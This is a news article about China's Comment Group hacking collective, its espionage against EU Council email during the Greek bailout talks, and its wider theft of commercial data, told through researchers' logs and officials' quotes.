China's Comment Group Hacks Europe—and the World
When Greece was falling apart last summer, European Union leaders rushed to prepare another round of capital injections for Athens. Someone with advance knowledge of just where those hundred billion-plus euros were going and when they’d be deployed could have made a fortune. Someone like the hackers who had infiltrated the EU Council’s computers.
Over 10 days last July, the hackers returned to the Council’s computers four times, accessing the e-mails of 11 top economic, security, and foreign affairs officials. On July 18, they accessed the e-mails of EU Council President Herman Van Rompuy, Europe’s point man for shepherding the delicate politics of the Greek bailout, in just 14 minutes.
The EU breach, first reported by Bloomberg News on July 27, was a particularly audacious act of cyber-espionage by the team long known to U.S. intelligence as Byzantine Candor. Arguably China’s preeminent hacker collective, it also has government ties, according to a 2008 U.S. State Department cable published by WikiLeaks. The collective’s tactic, hacking computers using hidden HTML code known as comments, earned it another name in private security circles: the Comment Group.
In secret, some 30 U.S.-based private-security researchers managed to monitor the group for nearly two months last summer. None of the researchers contacted by Bloomberg News wished to be named because of the sensitivity of the data. The researchers exploited a vulnerability in the hackers’ own security and created a digital diary that logged their every move as they crept into the networks of at least 20 victims, shut off antivirus systems, camouflaged themselves as system administrators, and then tried to cover their tracks.
The researchers’ computer logs offer an unprecedented minute-by-minute look at the Comment Group’s highly organized operations, believed to be at the cutting edge of China’s hacking capabilities. “They aren’t doing this for fun. They are doing it in this case because this is tradable information,” says Richard Falkenrath, formerly deputy assistant to the President and deputy homeland security adviser under George W. Bush. “We may not be able to get information that anyone either shorted or went long on EU sovereign debt on this, but that’s the obvious market.”
China’s foreign ministry in Beijing dismisses allegations of state-sponsored hacking as baseless and says the government will crack down given adequate proof. U.S. National Security Council spokesman Tommy Vietor declined to discuss the Comment Group specifically, referring reporters to a May 4 statement by Secretary of State Hillary Clinton in which she said the U.S. and China would work to “develop a shared understanding of acceptable norms of behavior” around commercial data and intellectual property online.
Beyond the Comment Group, what started as attacks on the U.S. military and defense contractors by Chinese hacker groups has widened into a campaign from which no corporate entity is safe. Attacks on Google, Morgan Stanley, and ExxonMobil are among the few that have become public. “What the general public hears about—stolen credit card numbers, somebody hacked LinkedIn—that’s the tip of the iceberg, the unclassified stuff,” says Shawn Henry, former executive assistant director at the FBI’s cyber division, who left the agency in April. “I’ve been circling the iceberg in a submarine. This is the biggest vacuuming up of U.S. proprietary data that we’ve ever seen. It’s a machine.”
The Comment Group researchers say the sheer volume and breadth of the hacker collective’s attacks shocked them. Victims ranged from corporate giants to top lawyers, from defense contractor Halliburton to Washington law firm Wiley Rein to a Canadian magistrate. Earlier targets included the 2008 presidential campaigns of Barack Obama and John McCain and a U.S. nuclear power plant sited next to a fault line. Alex Lanstein, a senior researcher for the security company FireEye, estimates the group has hacked more than 1,000 organizations since 2010.
Comment Group’s attacks have been so successful that a cyber-security unit within the Air Force Office of Special Investigations in San Antonio is dedicated to tracking them, according to a person familiar with the unit who could not speak on the record due to national security concerns. Most of the attacks the researchers witnessed, though, were commercial targets relevant to China’s economic interests. The lawyers targeted, for example, were pursuing trade claims against the country’s exporters; another victim was an energy company preparing to drill in a disputed area of the South China Sea that China officials say belongs to them.
U.S. spycatchers and private security researchers say Comment Group thefts include anything that could give China an edge as it strives to become the world’s largest economy. From the networks of major oil companies, they take seismic maps charting oil reserves; from patent law firms, clients’ trade secrets; from investment banks, market analysis that might affect the global ventures of state-owned companies. Drugmakers and tech companies are also targets.
One of the group’s tricks is to hijack unassuming websites and use them to send commands to victim computers. (Host websites have included those of a teacher at a south Texas high school and an Idaho drag-racing track.) This turns mom-and-pop sites into tools of foreign espionage; identifying such zombie sites provides a way to relatively easily track Comment Group activity.
In case after case, the hackers’ trail appeared wherever and whenever there were global headlines. Last summer, when the news focused on Europe’s debt crisis, the Comment Group followed. The timing coincided with a frantic period for EU Council President Van Rompuy, set off by the failure on July 11 of the EU finance ministers to agree on a second bailout package for Greece. Over the next 10 days, the slight, balding former Belgian prime minister presided over tense negotiations, drawing European leaders, including German Chancellor Angela Merkel and European Central Bank President Jean-Claude Trichet, to a consensus. And the hackers had a ringside seat.
It’s clear from the logs that this was less a smash-and-grab hack than the cyber equivalent of a wiretap aimed at gathering vast amounts of intelligence over weeks or months. The hackers had an established routine, always checking in around 9 a.m. local time, the logs show. They controlled a Council server that gave them a complete run of the e-mail system. From there, they simply signed onto the accounts of Van Rompuy and the others. The spies grabbed e-mails and attached documents, encrypted them in compressed files, and catalogued the reams of material by date. They took a week’s worth of e-mails each time, appearing to follow a set protocol. Their other targets included Odile Renaud-Basso, then-economic adviser and deputy head of the cabinet, and the EU’s counter-terrorism coordinator. It’s unclear how long the hackers’ incursion lasted, the researchers say.
There’s also no indication the hackers penetrated the Council’s offline system for secret documents. “Classified information and other sensitive internal information is handled on separate, dedicated networks,” the Council press office said in a statement when asked about the hacks. The e-mail networks “are not designed for handling classified information.”
The EU attacks were representative of the Comment Group’s playbook, the researchers say. Starting with a malware-laden e-mail, they moved rapidly through networks, nabbing encrypted passwords, cracking them off-line, and then returning to mimic the organization’s own network administrators. The hackers were able to dip in and out of networks, sometimes over months, disabling antivirus software and manipulating network administrator status as needed.
The Comment Group has changed up a few tactics since last summer, the researchers say, but not its pace. Falkenrath, the former Bush security aide, says China has succeeded in integrating decision-making about foreign economic and investment policy with intelligence collection. “That has big implications for the rest of the world when it deals with the country on those terms,” he says.